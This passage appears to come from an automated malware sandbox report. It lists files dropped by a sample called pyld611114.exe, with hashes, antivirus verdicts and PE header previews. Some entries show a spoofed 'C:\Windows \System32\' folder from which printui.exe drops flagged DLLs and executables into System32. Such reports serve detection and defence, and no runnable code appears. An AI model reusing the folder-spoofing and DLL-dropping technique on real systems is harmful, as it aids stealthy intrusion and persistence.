                                                                                          MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                          SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                          SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                          SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: dYUteuvmHn.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious, Browse
                                                                                          • Filename: app64.exe, Detection: malicious, Browse
                                                                                          • Filename: printui.dll, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, Detection: malicious, Browse
                                                                                          • Filename: F.7z, Detection: malicious, Browse
                                                                                          • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Windows\System32\console_zero.exe

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):477696
                                                                                          Entropy (8bit):6.57837388441486
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:gxB2z8RCqsezXL7YiebX6u+bjq7TC78Vd29ZXph0lhSMXlBXBWnZLcN5hwcf:UIqt7M2bjqnC7m2Xph0lhSMXliZLcF
                                                                                          MD5:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          SHA1:934FC91EE0AB5D8879E26BD9A5F002EDCB474602
                                                                                          SHA-256:941CB9145ACA265C4E209EF54C14E746696F198C48CE216A0F3FCDAB23DB877E
                                                                                          SHA-512:37E36C2A9AAF2B1B6E993BCCDA77B34EFB9AAC8C2260B310BB071592A475298F7FAA2F4DAC38D3402517483F811F57F57B4B9335C41D4140968608248003C012
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x...E......E..j...E..~..h@..r..h@..i..h@.. ..m@..z...E..}..x.....0A..z..0AP.y..0A..y..Richx..........................PE..d...^B.f.........."....).......................@..........................................`.....................................................P............@...6...................z..8............................x..@...............p............................text...0........................... ..`.rdata..f5.......6..................@..@.data...40..........................@....pdata...6...@...8..................@..@.fptable.............:..............@....rsrc................<..............@..@.reloc...............>..............@..B........................................................................................................................................................................................

                                                                                          C:\Windows\System32\libcrypto-3-x64.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4684800
                                                                                          Entropy (8bit):6.761708409908653
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                          MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                          SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                          SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                          SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\libcurl.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):561152
                                                                                          Entropy (8bit):6.383490918799092
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
                                                                                          MD5:93F8F5133ED40262B9FD437915718B82
                                                                                          SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
                                                                                          SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
                                                                                          SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\libiconv-2.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1851113
                                                                                          Entropy (8bit):6.295735352298234
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                          MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                          SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                          SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                          SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

                                                                                          C:\Windows\System32\libintl-9.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):475769
                                                                                          Entropy (8bit):5.442192544327632
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                          MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                          SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                          SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                          SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

                                                                                          C:\Windows\System32\libpq.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):327168
                                                                                          Entropy (8bit):6.055910692008984
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                          MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                          SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                          SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                          SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\libssl-3-x64.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):818176
                                                                                          Entropy (8bit):6.269258421632734
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                          MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                          SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                          SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                          SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\libwinpthread-1.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):52736
                                                                                          Entropy (8bit):5.840253326728635
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                          MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                          SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                          SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                          SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

                                                                                          C:\Windows\System32\ucrtbased.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1786880
                                                                                          Entropy (8bit):6.056894707447503
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                          MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                          SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                          SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                          SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\usvcinsta64.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\pyld611114.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14693888
                                                                                          Entropy (8bit):6.554170789313033
                                                                                          Encrypted:false
                                                                                          SSDEEP:393216:3PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:3ITkS6
                                                                                          MD5:11DDC0A34BAC7AB099D2EE8D9817BF58
                                                                                          SHA1:C9BD99F91118FCA4E1BFDEBC36CDED5B09BE39D0
                                                                                          SHA-256:0C396F737C1DECD395926CB52CC9F3D2AD1A3EEE5290DB62197CF617F2F0E554
                                                                                          SHA-512:62A0FF1412B3E28053FE2888D088C63B21BC07BD922C6286CAAF94FABAAC9FB5CABF91668CBEEE88E71B5B48F27613CBCCA63272A2AB604FCED69DA776567E49
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.L).F.,.L(...,.L/...,..I/...,..I(...,..I)..,.L-...,...-.}.,.H%...,.H....,.H....,.Rich..,.........................PE..d....C.f.........."....).(...".................@..........................................`.....................................................P....p.......0..<-..................`...8........................... ...@............@..`............................text....&.......(.................. ..`.rdata..>....@.......,..............@..@.data...h,..........................@....pdata..<-...0......................@..@.fptable.....`.......(..............@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................

                                                                                          C:\Windows\System32\vcruntime140d.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):131920
                                                                                          Entropy (8bit):6.0574531251583865
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                          MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                          SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                          SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                          SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                                                                                          C:\Windows\System32\winsvcf\winlogsvc

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):384
                                                                                          Entropy (8bit):7.477213331403198
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20GBrVU1zHjm5O:qm4BYhVXAst2cx7OxeM5Uww4BN/77j+O
                                                                                          MD5:65BB9A3C512A51DB4AEB9FF7DB94A97E
                                                                                          SHA1:105051128FD4ED96179EDA2A1F6EB97B93582BE6
                                                                                          SHA-256:AF5F54FC6D317E6A014120F2F57B24317AA3D6AA05CA68C1D7C45E30DA87A0DB
                                                                                          SHA-512:49375C038130A41CFDEF7F96F80151210F8A9CFB0E173DC6B750CFE650BA7B916A35DCD70525B61EF67BF156967E520160A2D2467D7BA5287C20B5DADE51730A
                                                                                          Malicious:false
                                                                                          Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZ....k....`y_5.|v3_.T..'.=F...C"...u..:.}...T.'....B$.....>.{"&..#W.RD;.3.=..Eo.

                                                                                          C:\Windows\System32\x816796.dat

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2256384
                                                                                          Entropy (8bit):6.5528122196655545
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:IIVkvsArhlpgxVnHkVnya+h0lhSMXlMDXg87/iXAah0lhSMXlDT/Z6Po7al9Nbtw:IMkkA1EHGnLag8TL3J6P7FGcjq
                                                                                          MD5:E4BD51C06CFF7A34FCCC4576AF852AFE
                                                                                          SHA1:D503AAFF2986C8F714D0FA457125BE566B6A9F95
                                                                                          SHA-256:FFAC21DD5AE0E22A1DC423361ECBFE5D73F2F11DB5A1F6906B03B2A0A2B6612C
                                                                                          SHA-512:5B2C69254F2EC25B2467983AE5C965F7860C4BDF8470E97594E6A0353CCC8E682B81815132FD38CE8B7F8F23FA013DA10C06C003C4B983A054651CC93A42324E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}.%.9dK.9dK.9dK.I.N..dK.I.H.0dK.).O.6dK.,.J.;dK.I.O.!dK.).H.2dK.).N..dK.V.J.;dK.I.J.4dK.9dJ.3eK.q.B.(dK.q.K.8dK.q.8dK.q.I.8dK.Rich9dK.........................PE..d...!?.f.........." ...)............4........................................."...........`..........................................}!.P....}!......."...... ".<.............".l...0...8.......................(.......@............0...............................text...d........................... ..`.rdata..f`...0...b... ..............@..@.data...4}....!..J....!.............@....pdata..<.... ".......!.............@..@.fptable......"......R".............@....rsrc........."......T".............@..@.reloc..l....."......V".............@..B........................................................................................................................................................................

                                                                                          C:\Windows\System32\zlib1.dll

                                                                                          Download File
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):90624
                                                                                          Entropy (8bit):6.511410074418791
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
                                                                                          MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
                                                                                          SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
                                                                                          SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
                                                                                          SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................[...a!....a!5...a!....a!....a!..............&....&....&7..._...&....Rich............................PE..d....,Of.........." ...(..................................................................`..........................................O......`W..........P....p..X...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...m.......n..................@..@.data........`.......L..............@....pdata..X....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_0p2kaahg.sfs.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_2jwvdjix.0yl.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_avkz4khy.xsb.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_ber2mz32.bsh.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
